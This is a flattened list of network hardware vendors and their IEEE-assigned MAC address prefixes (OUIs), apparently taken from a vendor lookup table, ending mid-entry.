ACOREL S.A.S 00262A Proxense, LLC 0025FE Pilot Electronics Corporation 00257B STJELECTRONICSPVTLTD 00257C Huachentel Technology Development Co., Ltd 002575 FiberPlex Technologies, LLC 002570 Eastern Communications Company Limited 00259B Beijing PKUNITY Microsystems Technology Co., Ltd 002596 GIGAVISION srl 002595 Northwest Signal Supply, Inc 0025C9 SHENZHEN HUAPU DIGITAL CO., LTD 00258F Trident Microsystems, Inc. 002589 Hills Industries Limited 002585 KOKUYO S&T Co., Ltd. 002581 x-star networks Inc. 0025B5 Cisco Systems, Inc 0025BE Tektrap Systems Inc. 0025A0 Nintendo Co., Ltd. 00254D Singapore Technologies Electronics Limited 00254C Videon Central, Inc. 002543 MONEYTECH 00255B CoachComm, LLC 002516 Integrated Design Tools, Inc. 002510 Pico-Tesla Magnetic Therapies 00256A inIT - Institut Industrial IT 002562 interbro Co. Ltd. 002520 SMA Railway Technology GmbH 002527 Bitrode Corp. 002525 CTERA Networks Ltd. 002551 SE-Elektronic GmbH 00253A CEVA, Ltd. 0024A2 Hong Kong Middleware Technology Limited 0024B9 Wuhan Higheasy Electronic Technology Development Co.Ltd 0024BD Hainzl Industriesysteme GmbH 0024B6 Seagate Technology 0024F7 Cisco Systems, Inc 0024E5 Seer Technology, Inc 0024E2 HASEGAWA ELECTRIC CO.,LTD. 0024E0 DS Tech, LLC 0024F3 Nintendo Co., Ltd. 002501 JSC Supertel 0024C8 Broadband Solutions Group 0024C5 Meridian Audio Limited 002496 Ginzinger electronic systems 002499 Aquila Technologies 00248A Kaga Electronics Co., Ltd. 002435 WIDE CORPORATION 002431 Uni-v co.,ltd 002432 Neostar Technology Co.,LTD 002443 Nortel Networks 002441 Wanzl Metallwarenfabrik GmbH 00243B CSSI (S) Pte Ltd 002451 Cisco Systems, Inc 00244A Voyant International 002447 Kaztek Systems 002477 Tibbo Technology 00246E Phihong USA Corp. 00245D Terberg besturingstechniek B.V. 002450 Cisco Systems, Inc 002458 PA Bastion CC 002473 3COM EUROPE LTD 00246B Covia, Inc. 0023F5 WILO SE 0023FF Beijing HTTC Technology Ltd. 0023F6 Softwell Technology Co., Ltd. 0023F3 Glocom, Inc. 0023F0 Shanghai Jinghan Weighing Apparatus Co. Ltd. 002410 NUETEQ Technology,Inc. 002408 Pacific Biosciences 002430 Ruby Tech Corp. 00242E Datastrip Inc. 00241D GIGA-BYTE TECHNOLOGY CO.,LTD. 00241A Red Beetle Inc. 002414 Cisco Systems, Inc 00240C DELEC GmbH 0023F9 Double-Take Software, INC. 0023E9 F5 Networks, Inc. 0023EA Cisco Systems, Inc 0023E5 IPaXiom Networks 0023B6 SECURITE COMMUNICATIONS / HONEYWELL 0023B8 Sichuan Jiuzhou Electronic Technology Co.,Ltd 0023BA Chroma 0023BC EQ-SYS GmbH 0023B1 Longcheer Technology (Singapore) Pte Ltd 002396 ANDES TECHNOLOGY CORPORATION 002394 Samjeon 002377 Isotek Electronics Ltd 002371 SOAM Systel 0023A1 Trend Electronics Ltd 0023A6 E-Mon 0023A8 Marshall Electronics 00239A EasyData Hardware GmbH 0023CC Nintendo Co., Ltd. 002379 Union Business Machines Co. Ltd. 00238C Private 0023C0 Broadway Networks 002358 SYSTEL SA 002356 Packet Forensics LLC 002350 RDC, Inc. dba LynTec 00234F Luminous Power Technologies Pvt. Ltd. 00234B Inyuan Technology Inc. 002349 Helmholtz Centre Berlin for Material and Energy 002346 Vestac 002307 FUTURE INNOVATION TECH CO.,LTD 002305 Cisco Systems, Inc 0022FF NIVIS LLC 002344 Objective Interface Systems, Inc. 00233C Alflex 002333 Cisco Systems, Inc 00232E Kedah Electronics Engineering, LLC 002320 Nicira Networks 002364 Power Instruments Pte Ltd 002317 Lasercraft Inc 00230E Gorba AG 002362 Goldline Controls 00235E Cisco Systems, Inc 002322 KISS Teknical Solutions, Inc. 0022B6 Superflow Technologies Group 0022B5 NOVITA 0022B2 4RF Communications Ltd 0022AC Hangzhou Siyuan Tech. Co., Ltd 0022AD TELESIS TECHNOLOGIES, INC. 0022AE Mattel Inc. 0022D5 Eaton Corp. Electrical Group Data Center Solutions - Pulizzi 0022D1 Albrecht Jung GmbH & Co. KG 0022D2 All Earth Comércio de Eletrônicos LTDA. 0022C2 Proview Eletrônica do Brasil LTDA 0022BD Cisco Systems, Inc 0022BA HUTH Elektronik Systeme GmbH 0022BB beyerdynamic GmbH & Co. KG 0022A3 California Eastern Laboratories 002302 Cobalt Digital, Inc. 0022F5 Advanced Realtime Tracking GmbH 0022CA Anviz Biometric Tech. Co., Ltd. 0022C7 SEGGER Microcontroller GmbH & Co. KG 0022C1 Active Storage Inc. 00228F CNRS 002297 XMOS Semiconductor 002292 Cinetal 0022E5 Fisher-Rosemount Systems Inc. 0022E4 APASS TECHNOLOGY CO., LTD. 00224F Byzoro Networks Ltd. 002251 Lumasense Technologies 00225E Uwin Technologies Co.,LTD 002258 Taiyo Yuden Co., Ltd. 00225B Teradici Corporation 002259 Guangzhou New Postcom Equipment Co.,Ltd. 002253 Entorian Technologies 00222C Ceton Corp 00222D SMC Networks Inc. 00222A SoundEar A/S 00227E Chengdu 30Kaitian Communication Industry Co.Ltd 00227C Woori SMT Co.,ltd 002277 NEC Australia Pty Ltd 00223D JumpGen Systems, LLC 002239 Indiana Life Sciences Incorporated 002235 Strukton Systems bv 002279 Nippon Conlux Co., Ltd. 002271 Jäger Computergesteuerte Meßtechnik GmbH. 002247 DAC ENGINEERING CO., LTD. 00221F eSang Technologies Co., Ltd. 0021E6 Starlight Video Limited 0021E0 CommAgility Ltd 0021DE Firepro Wireless 0021F9 WIRECOM Technologies 0021FA A4SP Technologies Ltd. 0021F0 EW3 Technologies LLC 0021D3 BOCOM SECURITY(ASIA PACIFIC) LIMITED 0021CC Flextronics International 0021B9 Universal Devices Inc. 0021B3 Ross Controls 0021B6 Triacta Power Technologies Inc. 002217 Neat Electronics 002211 Rohati Systems 0021CF The Crypto Group 0021C5 3DSP Corp 002212 CAI Networks, Inc. 00220D Cisco Systems, Inc 002208 Certicom Corp 0021EE Full Spectrum Inc. 0021EC Solutronic GmbH 002205 WeLink Solutions, Inc. 002209 Omron Healthcare Co., Ltd 00218C TopControl GMBH 00218A Electronic Design and Manufacturing Company 00218B Wescon Technology, Inc. 002184 POWERSOFT SRL 002178 Matuschek Messtechnik GmbH 002173 Ion Torrent Systems, Inc. 002177 W. L. Gore & Associates 002172 Seoultek Valley 002153 SeaMicro Inc. 00217A Sejin Electron, Inc. 0021A4 Dbii Networks 002199 Vacon Plc 0021A0 Cisco Systems, Inc 002198 Thai Radio Co, LTD 0021AE ALCATEL-LUCENT FRANCE - WTD 0021AF Radio Frequency Systems 002154 D-TACQ Solutions Ltd 002169 Prologix, LLC. 00214B Shenzhen HAMP Science & Technology Co.,Ltd 002145 Semptian Technologies Ltd. 001FFE HPN Supply Chain 001FFF Respironics, Inc. 001FFC Riccius+Sohn GmbH 001FFD Indigo Mobile Technologies Corp. 002121 VRmagic GmbH 002123 Aerosat Avionics 00210A byd:sign Corporation 002107 Seowonintech Co Ltd. 00213E TomTom 00213F A-Team Technology Ltd. 00211B Cisco Systems, Inc 00212D SCIMOLEX CORPORATION 001FD5 MICRORISC s.r.o. 001FB1 Cybertech Inc. 001FB2 Sontheim Industrie Elektronik GmbH 001FEE ubisys technologies GmbH 001FEF SHINSEI INDUSTRIES CO.,LTD 001FEC Synapse Électronique 001FCA Cisco Systems, Inc 001FC3 SmartSynch, Inc 001FE0 EdgeVelocity Corp 001FD8 A-TRUST COMPUTER CORPORATION 001FD7 TELERAD SA 001FD3 RIVA Networks Inc. 001FC1 Hanlong Technology Co.,LTD 001FBB Xenatech Co.,LTD 001FE8 KURUSUGAWA Electronics Industry Inc,. 001FAB I.S HIGH TECH.INC 001FAC Goodmill Systems Ltd 001F36 Bellwin Information Co. Ltd., 001F3D Qbit GmbH 001F38 POSITRON 001F2D Electro-Optical Imaging, Inc. 001F89 Signalion GmbH 001F8A Ellion Digital Inc. 001F7F Phabrix Limited 001F76 AirLogic Systems Inc. 001F73 Teraview Technology Co., Ltd. 001F62 JSC Stilsoft 001F67 Hitachi,Ltd. 001F56 DIGITAL FORECAST 001F52 UVT Unternehmensberatung fur Verkehr und Technik GmbH 001F4F Thinkware Co. Ltd. 001F2F Berker GmbH & Co. KG 001F32 Nintendo Co., Ltd. 001F44 GE Transportation Systems 001F39 Construcciones y Auxiliar de Ferrocarriles, S.A. 001F7C Witelcom AS 001F7A WiWide Inc. 001F77 HEOL DESIGN 001F94 Lascar Electronics Ltd 001F8E Metris USA Inc. 001F61 Talent Communication Networks Inc. 001ECE BISA Technologies (Hong Kong) Limited 001EC8 Rapid Mobile (Pty) Ltd 001ECC CDVI 001EC5 Middle Atlantic Products Inc 001F03 NUM AG 001EFF Mueller-Elektronik GmbH & Co. KG 001F05 iTAS Technology Corp. 001F07 AZTEQ Mobile 001EF6 Cisco Systems, Inc 001EF9 Pascom Kommunikations systeme GmbH. 001EF3 From2 001F19 BEN-RI ELECTRONICA S.A. 001F11 OPENMOKO, INC. 001EE4 ACS Solutions France 001EED Adventiq Ltd. 001ED2 Ray Shine Video Technology Inc 001ED4 Doble Engineering 001EFD Microbit 2.0 AB 001EE7 Epic Systems Inc 001EE9 Stoneridge Electronics AB 001F1C KOBISHI ELECTRIC Co.,Ltd. 001E79 Cisco Systems, Inc 001E76 Thermo Fisher Scientific 001E72 PCS 001E5F KwikByte, LLC 001E5B Unitron Company, Inc. 001E5E COmputime Ltd. 001E9D Recall Technologies, Inc. 001E95 SIGMALINK 001E93 CiriTech Systems Inc 001EA2 Symx Systems, Inc. 001EA9 Nintendo Co., Ltd. 001E9E ddm hopt + schuler Gmbh + Co. KG 001EBE Cisco Systems, Inc 001EC3 Kozio, Inc. 001EBD Cisco Systems, Inc 001EB9 Sing Fai Technology Limited 001EB7 TBTech, Co., Ltd. 001E69 Thomson Inc. 001E92 JEULIN S.A. 001E91 KIMIN Electronic Co., Ltd. 001E89 CRFS Limited 001E86 MEL Co.,Ltd. 001E88 ANDOR SYSTEM SUPPORT CO., LTD. 001E0C Sherwood Information Partners, Inc. 001E02 Sougou Keikaku Kougyou Co.,Ltd. 001E01 Renesas Technology Sales Co., Ltd. 001DFF Network Critical Solutions Ltd 001E00 Shantou Institute of Ultrasonic Instruments 001E54 TOYO ELECTRIC Corporation 001E3C Lyngbox Media AB 001E4D Welkin Sciences, LLC 001E4B City Theatrical 001E4A Cisco Systems, Inc 001E13 Cisco Systems, Inc 001E0D Micran Ltd. 001E09 ZEFATEK Co.,LTD 001E06 WIBRAIN 001E2C CyVerse Corporation 001E26 Digifriends Co. Ltd 001E23 Electronic Educational Devices, Inc 001DF3 SBS Science & Technology Co., Ltd 001DEE NEXTVISION SISTEMAS DIGITAIS DE TELEVISÃO LTDA. 001DEA Commtest Instruments Ltd 001DDD DAT H.K. LIMITED 001DE4 Visioneered Image Systems 001DE2 Radionor Communications 001DD7 Algolith 001DC9 GainSpan Corp. 001D86 Shinwa Industries(China) Ltd. 001D88 Clearwire 001D81 GUANGZHOU GATEWAY ELECTRONICS CO., LTD 001D7D GIGA-BYTE TECHNOLOGY CO.,LTD. 001DC7 L-3 Communications Geneva Aerospace 001D89 VaultStor Corporation 001D66 Hyundai Telecom 001D77 NSGate 001DA2 Cisco Systems, Inc 001D99 Cyan Optic, Inc. 001D9B Hokuyo Automatic Co., Ltd. 001DBC Nintendo Co., Ltd. 001DB6 BestComm Networks, Inc. 001DAC Gigamon Systems LLC 001D15 Shenzhen Dolphin Electronic Co., Ltd 001D16 SFR 001D11 Analogue & Micro Ltd 001D12 ROHM CO., LTD. 001D47 Covote GmbH & Co KG 001D41 Hardy Instruments 001D3D Avidyne Corporation 001D3C Muscle Corporation 001D3A mh acoustics LLC 001D49 Innovation Wireless Inc. 001D46 Cisco Systems, Inc 001D48 Sensor-Technik Wiedemann GmbH 001D76 Eyeheight Ltd. 001D7A Wideband Semiconductor, Inc. 001D68 Thomson Telecom Belgium 001D26 Rockridgesound Technology Co. 001D35 Viconics Electronics Inc. 001D31 HIGHPRO INTERNATIONAL R&D CO,.LTD. 001D61 BIJ Corporation 001D5C Tom Communication Industrial Co.,Ltd. 001D56 Kramer Electronics Ltd. 001D4E TCM Mobile LLC 001D21 Alcad SL 001D1C Gennet s.a. 001CE1 INDRA SISTEMAS, S.A. 001CE0 DASAN TPS 001CD9 GlobalTop Technology Inc. 001CDA Exegin Technologies Limited 001CD2 King Champion (Hong Kong) Limited 001CA6 Win4NET 001CA9 Audiomatica Srl 001CA1 AKAMAI TECHNOLOGIES, INC. 001C99 Shunra Software Ltd. 001CF9 Cisco Systems, Inc 001CF1 SUPoX Technology Co. , LTD. 001CCE By Techdesign 001CF3 EVS BROADCAST EQUIPMENT 001CF4 Media Technology Systems Inc 001CE6 INNES 001CB9 KWANG SUNG ELECTRONICS CO., LTD. 001D03 Design Solutions Inc. 001CA3 Terra 001C90 Empacket Corporation 001C8E Alcatel-Lucent IPD 001C8F Advanced Electronic Design, Inc. 001C88 TRANSYSTEM INC. 001C86 Cranite Systems, Inc. 001C4F MACAB AB 001C4E TASA International Limited 001C4B Gener8, Inc. 001C9B FEIG ELECTRONIC GmbH 001C95 Opticomm Corporation 001C97 Enzytek Technology Inc., 001C70 NOVACOMM LTDA 001C6E Newbury Networks, Inc. 001C6B COVAXCo. Ltd 001C69 Packet Vision Ltd 001C3D WaveStorm 001C7F Check Point Software Technologies 001C78 WYPLAY SAS 001C58 Cisco Systems, Inc 001C5A Advanced Relay Corporation 001C65 JoeScan, Inc. 001C5F Winland Electronics, Inc. 001C40 VDG-Security bv 001C3A Element Labs, Inc. 001C18 Sicert S.r.L. 001C1A Thomas Instrumentation, Inc 001C0E Cisco Systems, Inc 001C13 OPTSYS TECHNOLOGY CO., LTD. 001C0B SmartAnt Telecom 001BD0 IDENTEC SOLUTIONS 001BCD DAVISCOMMS (S) PTE LTD 001BCA Beijing Run Technology LTD. Company 001BCC KINGTEK CCTV ALLIANCE CO., LTD. 001BF4 KENWIN INDUSTRIAL(HK) LTD. 001BF9 Intellitect Water Ltd 001BFA G.i.N. mbH 001BF3 TRANSRADIO SenderSysteme Berlin AG 001C21 Nucsafe Inc. 001C1E emtrion GmbH 001BDE Renkus-Heinz, Inc. 001BDB Valeo VECS 001BD8 FLIR Systems Inc 001BD4 Cisco Systems, Inc 001C2D FlexRadio Systems 001C2C Synapse 001C08 Echo360, Inc. 001BC8 MIURA CO.,LTD 001BC1 HOLUX Technology, Inc. 001BBC Silver Peak Systems, Inc. 001B73 DTL Broadcast Ltd 001B71 Telular Corp. 001B97 Violin Technologies 001BA8 UBI&MOBI,.Inc 001B81 DATAQ Instruments, Inc. 001B7D CXR Anderson Jacobson 001B79 FAIVELEY TRANSPORT 001B65 China Gridcom Co., Ltd 001B88 Divinet Access Technologies Ltd 001B83 Finsoft Ltd 001BAB Telchemy, Incorporated 001BAE Micro Control Systems, Inc 001BA0 Awox 001B51 Vector Technology Corp. 001B54 Cisco Systems, Inc 001B4A W&W Communications, Inc. 001AFA Welch Allyn, Inc. 001AF7 dataschalt e+a GmbH 001AF3 Samyoung Electronics 001AEF Loopcomm Technology, Inc. 001AEC Keumbee Electronics Co.,Ltd. 001B44 SanDisk Corporation 001B46 Blueone Technology Co.,Ltd 001B40 Network Automation mxc AB 001B42 Wise & Blue 001B35 ChongQing JINOU Science & Technology Development CO.,Ltd 001B36 Tsubata Engineering Co.,Ltd. (Head Office) 001B39 Proxicast 001B3B Yi-Qing CO., LTD 001B20 TPine Technology 001B22 Palit Microsystems ( H.K.) Ltd. 001B1C Coherent 001B19 IEEE I&M Society TC9 001B64 IsaacLandKorea Co., Ltd, 001B26 RON-Telecom ZAO 001B13 Icron Technologies Corporation 001B0F Petratec 001AA9 FUJIAN STAR-NET COMMUNICATION CO.,LTD 001AA8 Mamiya Digital Imaging Co., Ltd. 001A99 Smarty (HZ) Information Electronics Co., Ltd 001AA6 Telefunken Radio Communication Systems GmbH &CO.KG 001A96 ECLER S.A. 001A91 FusionDynamic Ltd. 001A8C Sophos Ltd 001AB3 VISIONITE INC. 001ACA Tilera Corporation 001A84 V One Multimedia Pte Ltd 001AB9 PMC 001ABA Caton Overseas Limited 001AD1 FARGO CO., LTD. 001A3A Dongahelecomm 001A3B Doah Elecom Inc. 001A3C Technowave Ltd. 001A40 A-FOUR TECH CO., LTD. 001A30 Cisco Systems, Inc 001A7B Teleco, Inc. 001A36 Aipermon GmbH & Co. KG 001A26 Deltanode Solutions AB 001A6D Cisco Systems, Inc 001A6E Impro Technologies 001A6C Cisco Systems, Inc 001A4A Qumranet Inc. 001A3E Faster Technology LLC 001A63 Elster Solutions, LLC, 001A59 Ircona 001A46 Digital Multimedia Technology Co., Ltd 001A25 DELTA DORE 0019FE SHENZHEN SEECOMM TECHNOLOGY CO.,LTD. 0019FD Nintendo Co., Ltd. 001A0D HandHeld entertainment, Inc. 001A0E Cheng Uei Precision Industry Co.,Ltd 0019CD Chengdu ethercom information technology Ltd. 0019D9 Zeutschel GmbH 001A01 Smiths Medical 0019CA Broadata Communications, Inc 0019D3 TRAK Microwave 0019C3 Qualitrol 0019BE Altai Technologies Limited 0019B4 Intellio Ltd 0019BA Paradox Security Systems Ltd 0019A1 LG INFORMATION & COMM. 0019A8 WiQuest Communications 0019ED Axesstel Inc. 0019F6 Acconet (PTE) Ltd 001A15 gemalto e-Payment 001968 Digital Video Networks(Shanghai) CO. LTD. 00197F PLANTRONICS, INC. 00197A MAZeT GmbH 001978 Datum Systems, Inc. 001989 Sonitrol Corporation 00198E Oticon A/S 001980 Gridpoint Systems 001983 CCT R&D Limited 00194C Fujian Stelcom information & Technology CO.,Ltd 00194A TESTO AG 00198A Northrop Grumman Systems Corp. 001960 DoCoMo Systems, Inc. 00195A Jenaer Antriebstechnik GmbH 00196D Raybit Systems Korea, Inc 001970 Z-Com, Inc. 001950 Harman Multimedia 0018EE Videology Imaging Solutions, Inc. 0018EB Blue Zen Enterprises Private Limited 001924 LBNLEngineering 00191A IRLINK 001916 PayTec AG 00190E Atech Technology Co., Ltd. 001939 Gigamips 00193A OESOLUTIONS 0018E2 Topdata Sistemas de Automacao Ltda 001922 CM Comandos Lineares 00191D Nintendo Co., Ltd. 00192F Cisco Systems, Inc 001905 SCHRACK Seconet AG 001907 Cisco Systems, Inc 0018FB Compro Technology 0018C3 CS Corporation 0018CA Viprinet GmbH 0018C7 Real Time Automation 0018BB Eliwell Controls srl 0018BF Essence Technology Solution, Inc. 00188C Mobile Action Technology Inc. 00188F Montgomery Technology, Inc. 001884 Fon Technology S.L. 001880 Maxim Integrated Products 0018D0 AtRoad,A Trimble Company 0018D2 High-Gain Antennas LLC 0018D3 TEAMCAST 0018C6 OPW Fuel Management Systems 00187C INTERCROSS, LLC 001870 E28 Shanghai Limited 001872 Expertise Engineering 0018DC Prostar Co., Ltd. 0018D1 Siemens Home & Office Comm. Devices 0018AA Protec Fire Detection plc 001896 Great Well Electronic LTD 001890 RadioCOM, s.r.o. 0018B9 Cisco Systems, Inc 0018B8 New Voice International AG 0018A1 Tiqit Computers, Inc. 001812 Beijing Xinwei Telecom Technology Co., Ltd. 00180B Brilliant Telecommunications 001861 Ooma, Inc. 00185B Network Chemistry, Inc 001855 Aeromaritime Systembau GmbH 001851 SWsoft 001874 Cisco Systems, Inc 001869 KINGJIM 001856 EyeFi, Inc 00184E Lianhe Technologies, Inc. 00184C Bogen Communications 001826 Cale Access AB 00182D Artec Design 00182A Taiwan Video & Monitor 00183B CENITS Co., Ltd. 00183C Encore Software Limited 001841 High Tech Computer Corp 001819 Cisco Systems, Inc 00180C Optelian Access Networks 001810 IPTrade S.A. 001809 CRESYN 001804 E-TEK DIGITAL TECHNOLOGY LIMITED 001800 UNIGRAND LTD 0017FD Amulet Hotkey 0017FC Suprema Inc. 0017FB FA 0017D8 Magnum Semiconductor, Inc. 0017DA Spans Logic 0017CF iMCA-GmbH 0017B9 Gambro Lundia AB 0017B3 Aftek Infosys Limited 0017A2 Camrivox Ltd. 00175F XENOLINK Communications Co., Ltd. 00175C SHARP CORPORATION 00179D Kelman Limited 001790 HYUNDAI DIGITECH Co, Ltd. 001791 LinTech GmbH 001795 Cisco Systems, Inc 001759 Cisco Systems, Inc 001754 Arkino HiTOP Corporation Limited 001752 DAGS, Inc 001756 Vinci Labs Oy 001777 Obsidian Research Corporation 00176A Avago Technologies 001786 wisembed 001782 LoBenn Inc. 001778 Central Music Co. 00176B Kiyon, Inc. 001799 SmarTire Systems Inc. 00177F Worldsmart Retech 00176E DUCATI SISTEMI 001774 Elesta GmbH 00170C Twig Com Ltd. 00170D Dust Networks Inc. 00170B Contela, Inc. 00170F Cisco Systems, Inc 001704 Shinco Electronics Group Co.,Ltd 001707 InGrid, Inc 001712 ISCO International 0016D8 Senea AB 0016D6 TDA Tech Pty Ltd 0016D5 Synccom Co., Ltd 0016C9 NAT Seattle, Inc. 0016C6 North Atlantic Industries 001724 Studer Professional Audio GmbH 001702 Osung Midicom Co., Ltd 0016F7 L-3 Communications, Aviation Recorders 00172D Axcen Photonics Corporation 001741 DEFIDEV 001738 International Business Machines 00171E Theo Benning GmbH & Co. KG 0016D2 Caspian 0016A4 Ezurio Ltd 001699 Tonic DVB Marketing Ltd 00169B Alstom Transport 001690 J-TEK INCORPORATION 001693 PowerLink Technology Inc. 001698 T&A Mobile Phones 001662 Liyuh Technology Ltd. 001661 Novatium Solutions (P) Ltd 001664 Prod-El SpA 00165E Precision I/O 001658 Fusiontech Technologies Inc. 0016A5 Tandberg Storage ASA 0016A1 3Leaf Networks 001666 Quantier Communication Inc. 001681 Vector Informatik GmbH 00BAC0 Biometric Access Company 001685 Elisa Oyj 001680 Bally Gaming + Systems 001696 QDI Technology (H.K.) Limited 0016BE INFRANET, Inc. 0016AB Dansensor A/S 001653 LEGO System A/S IE Electronics Division 001652 Hoatech Technologies, Inc. 001650Kratos EPD 0015FA Cisco Systems, Inc 0015FC Littelfuse Startco 0015F7 Wintecronics Ltd. 001630 Vativ Technologies 00162F Geutebrück GmbH 00162B Togami Electric Mfg.co.,Ltd. 001642 Pangolin 00163B VertexRSI/General Dynamics 001637 CITEL SpA 001608 Sequans Communications 001624 Teneros, Inc. 0015F8 Kingtronics Industrial Co. Ltd. 00161C e:cue 0015B8 Tahoe 0015B6 ShinMaywa Industries, Ltd. 0015B0 AUTOTELENET CO.,LTD 0015B1 Ambient Corporation 00159F Terascala, Inc. 00159E Mad Catz Interactive Inc 0015A1 ECA-SINTERS 001593 U4EA Technologies Inc. 001581 MAKUS Inc. 00157A Telefin S.p.A. 0015C3 Ruf Telematik AG 0015E6 MOBILE TECHNIKA Inc. 0015DB Canesta Inc. 00158D Jennic Ltd 001584 Schenck Process GmbH 0015CC UQUEST, LTD. 0015C6 Cisco Systems, Inc 0015D7 Reti Corporation 0015CB Surf Communication Solutions Ltd. 0015A7 Robatech AG 001523 Meteor Communications Corporation 001524 Numatics, Inc. 00151B Isilon Systems Inc. 001573 NewSoftTechnology Corporation 001575 Nevis Networks Inc. 00156C SANE SYSTEM CO., LTD 00156A DG2L Technologies Pvt. Ltd. 001529 N3 Corporation 00152D TenX Networks, LLC 00156F Xiranet Communications GmbH 001572 Red-Lemon 001567 RADWIN Inc. 00155B Sampo Corporation 001553 Cytyc Corporation 001551 RadioPulse Inc. 001552 Wi-Gear Inc. 00153E Q-Matic Sweden AB 001542 MICROHARD S.R.L. 00154E IEC 001550 Nits Technology Inc 001546 ITG Worldwide Sdn Bhd 00155D Microsoft Corporation 001562 Cisco Systems, Inc 0014E1 Data Display AG 0014E3 mm-lab GmbH 0014D9 IP Fabrics, Inc. 0014D6 Jeongmin Electronics Co.,Ltd. 0014F9 Vantage Controls 0014E7 Stolinx,. Inc 0014E9 Nortech International 0014ED Airak, Inc. 0014CE NF CORPORATION 0014D0 BTI Systems Inc. 001503 PROFIcomms s.r.o. 001509 Plus Technology Co., Ltd 0014F0 Business Security OL AB 0014F2 Cisco Systems, Inc 001510 Techsphere Co., Ltd 001513 EFS sas 00148B Globo Electronic GmbH & Co. KG 001490 ASP Corporation 001484 Cermate Technologies Inc. 001479 NEC Magnus Communications,Ltd. 00147B Iteris, Inc. 0014BB Open Interface North America 001470 Prokom Software SA 001467 ArrowSpan Inc. 00145F ADITEC CO. LTD 001488 Akorri 00147A Eubus GmbH 00146D RF Technologies 0014AC Bountiful WiFi 0014A8 Cisco Systems, Inc 0014A0 Accsense, Inc. 001459 Moram Co., Ltd. 001457 T-VIPS AS 001453 ADVANTECH TECHNOLOGIES CO.,LTD 001454 Symwave 0013F8 Dex Security Solutions 0013F9 Cavera Systems 0013F2 Klas Ltd 0013F7 SMC Networks, Inc. 00144B Hifn, Inc. 001441 Innovation Sound Technology Co., LTD. 00143C Rheinmetall Canada Inc. 00141A DEICY CORPORATION 00141C Cisco Systems, Inc 00140C GKB CCTV CO., LTD. 0013FE GRANDTEC ELECTRONIC CORP. 001435 CityCom Corp. 001448 Inventec Multimedia & Telecom Corporation 001416 Scosche Industries, Inc. 001426 NL Technology 0013C5 LIGHTRON FIBER-OPTIC DEVICES INC. 0013C4 Cisco Systems, Inc 0013C2 WACOM Co.,Ltd 0013BF Media System Planning Corp. 0013BB Smartvue Corporation 0013B5 Wavesat 0013AF NUMA Technology,Inc. 0013B0 Jablotron 00139A K-ubique ID Corp. 00139E Ciara Technologies Inc. 00139D MaxLinear Hispania S.L.U. 0013D5 RuggedCom 0013D6 TII NETWORK TECHNOLOGIES, INC. 0013DB SHOEI Electric Co.,Ltd 0013CD MTI co. LTD 0013D3 MICRO-STAR INTERNATIONAL CO., LTD. 0013CA Pico Digital 0013E6 Technolution 0013DF Ryvor Corp. 00138D Kinghold 0013ED PSIA 0013B1 Intelligent Control Systems (Asia) Pte Ltd 00133C QUINTRON SYSTEMS INC. 00133D Micro Memory Curtiss Wright Co 00133F Eppendorf Instrumente GmbH 001341 Shandong New Beiyang Information Technology Co.,Ltd 001330 EURO PROTECTION SURVEILLANCE 001325 Cortina Systems Inc 001331 CellPoint Connect 001335 VS Industry Berhad 00132F Interactek 00134C YDT Technology International 001359 ProTelevision Technologies A/S 001350 Silver Spring Networks, Inc 00137F Cisco Systems, Inc 001382 Cetacea Networks Corporation 001390 Termtek Computer Co., Ltd 001375 American Security Products Co. 001358 Realm Systems, Inc. 0012C1 Check Point Software Technologies 0012BB Telecommunications Industry Association TR-41 Committee 0012B6 Santa Barbara Infrared, Inc. 0012B9 Fusion Digital Technology 0012ED AVG Advanced Technologies 0012EA Trane 0012E7 Projectek Networking Electronics Corp. 0012C3 WIT S.A. 0012C8 Perfect tech 0012C6 TGC America, Inc 0012CC Bitatek CO., LTD 0012FA THX LTD 001306 Always On Wireless 0012FD OPTIMUS IC S.A. 001305 Epicom, Inc. 0012E4 ZIEHL industrie-electronik GmbH + Co KG 001297 O2Micro, Inc. 00129D First International Computer do Brasil 00129C Yulinet 001290 KYOWA Electric & Machinery Corp. 001291 KWS Computersysteme GmbH 001295 Aiware Inc. 00128B Sensory Networks Inc 00128F Montilio 0012A3 Trust International B.V. 0012A7 ISR TECHNOLOGIES Inc 0012AA IEE, Inc. 00129F RAE Systems 0012B5 Vialta, Inc. 0012B1 Dai Nippon Printing Co., Ltd 001289 Advance Sterilization Products 001284 Lab33 Srl 001281 March Networks S.p.A. 00127E Digital Lifestyles Group, Inc. 00126B Ascalade Communications Limited 001233 JRC TOKKI Co.,Ltd. 00125B KAIMEI ELECTRONI 001259 THERMO ELECTRON KARLSRUHE 00125A Microsoft Corporation 00123D GES Co, Ltd 001239 S Net Systems Inc. 00122F Sanei Electric Inc. 001230 Picaso Infocommunication CO., LTD. 001246 T.O.M TECHNOLOGY INC.. 001256 LG INFORMATION & COMM. 001214 Koenig & Bauer AG 00120F IEEE 802.3 00121D Netfabric Corporation 00120C CE-Infosys Pte Ltd 0011B3 YOSHIMIYA CO.,LTD. 0011B6 Open Systems International 0011B0 Fortelink Inc. 0011AC Simtec Electronics 0011AD Shanghai Ruijie Technology 0011CD Axsun Technologies 0011C5 TEN Technology 0011BE AGP Telecom Co. Ltd 0011BA Elexol Pty Ltd 0011BC Cisco Systems, Inc 0011A8 Quest Technologies 0011A1 VISION NETWARE CO.,LTD 0011E2 Hua Jung Components Co., Ltd. 0011DA Vivaas Technology Inc. 0011DD FROMUS TEC. Co., Ltd. 0011EB Innovative Integration 0011EA IWICS Inc. 0011E4 Danelec Electronics A/S 0011E1 Arcelik A.S 0011FB Heidelberg Engineering GmbH 0011D6 HandEra, Inc. 0011CA Long Range Systems, Inc. 0011EF Conitec Datensysteme GmbH 00114F US Digital Television, Inc 001182 IMI Norgren Ltd 00117A Singim International Corp. 001148 Prolon Control Systems 001140 Nanometrics Inc. 001144 Assurance Technology Corp 001163 SYSTEM SPA DEPT. ELECTRONICS 00118F EUTECH INSTRUMENTS PTE. LTD. 00118D Hanchang System Corp. 00115F ITX Security Co., Ltd. 001153 Trident Tek, Inc. 001172 COTRON CORPORATION 0011A0 Vtech Engineering Canada Ltd 00119B Telesynergy Research Inc. 001191 CTS-Clima Temperatur Systeme GmbH 001189 Aerotech Inc 000FFB Nippon Denso Industry Co., Ltd. 000FF2 Loud Technologies Inc. 000FF1 nex-G Systems Pte.Ltd 001101 CET Technologies Pte Ltd 000FFF Control4 000FFC Merit Li-Lin Ent. 001113 Fraunhofer FOKUS 001112 Honeywell CMSS 000FE0 NComputing Co.,Ltd. 000FE3 Damm Cellular Systems A/S 001128 Streamit 00113F Alcatel DI 001137 AICHI ELECTRIC CO., LTD. 000FF3 Jung Myoung Communications&Technology 00113A SHINBORAM 000F89 Winnertec System Co., 